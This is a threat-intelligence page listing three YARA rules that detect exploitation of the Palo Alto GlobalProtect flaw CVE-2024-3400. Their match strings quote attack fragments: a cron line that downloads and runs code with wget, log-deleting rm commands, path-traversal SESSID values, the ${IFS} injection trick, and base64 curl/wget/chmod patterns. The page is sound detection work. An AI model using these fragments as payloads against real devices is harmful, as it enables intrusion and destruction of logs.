Home/CVE-2024-3400/YARA rules
YARA

YARA rules for CVE-2024-3400

3 rules · scoped to cve · back to CVE-2024-3400
YARA rules whose family, name, or description matches this cve or its tooling. Use these for binary-pattern hunts.

YARA rules

3 of 3
direct UTA028
APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1
Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability
author Florian Roth license see source repo
view YARA rule 
rule APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1 : SCRIPT {
   meta:
      description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      modified = "2024-04-18"
      score = 70
      id = "32cf18ff-784d-5849-87f8-14ede7315188"
   strings:
      $x1 = "cmd = base64.b64decode(rst.group"
      $x2 = "f.write(\"/*\"+output+\"*/\")"

      $x3 = "* * * * * root wget -qO- http://"
      $x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"

      $x5a = "failed to unmarshal session(../" // https://security.paloaltonetworks.com/CVE-2024-3400
      $x5b = "failed to unmarshal session(./../" // customer data

      $x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
      $x7 = "$(uname -a) > /var/" base64
   condition:
      1 of them
}
direct PaloAlto
EXPL_PaloAlto_CVE_2024_3400_Apr24_1
Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400
author Florian Roth license see source repo
view YARA rule 
rule EXPL_PaloAlto_CVE_2024_3400_Apr24_1 {
   meta:
      description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
      author = "Florian Roth"
      reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
      date = "2024-04-15"
      score = 70
      id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
   strings:
      $x1 = "SESSID=../../../../opt/panlogs/"
      $x2 = "SESSID=./../../../../opt/panlogs/"
      
      $sa1 = "SESSID=../../../../"
      $sa2 = "SESSID=./../../../../"
      
      $sb2 = "${IFS}"
   condition:
      1 of ($x*)
      or (1 of ($sa*) and $sb2)
}
direct LNX
SUSP_LNX_Base64_Exec_Apr24
Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
author Christian Burkard license see source repo
view YARA rule 
rule SUSP_LNX_Base64_Exec_Apr24 : SCRIPT {
   meta:
      description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
      author = "Christian Burkard"
      date = "2024-04-18"
      modified = "2025-03-21"
      reference = "Internal Research"
      score = 75
      id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
   strings:
      $s1 = "curl http://" base64
      $s2 = "wget http://" base64
      $s3 = ";chmod 777 " base64
      // $s4 = "/tmp/" base64 // prone to FPs
      
      $mirai = "country="

      $fp1 = "<html"
      $fp2 = "<?xml"
   condition:
      filesize < 800KB
      and 1 of ($s*) 
      and not $mirai
      and not 1 of ($fp*)
}
Showing 1-3 of 3
Prev 1 Next
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin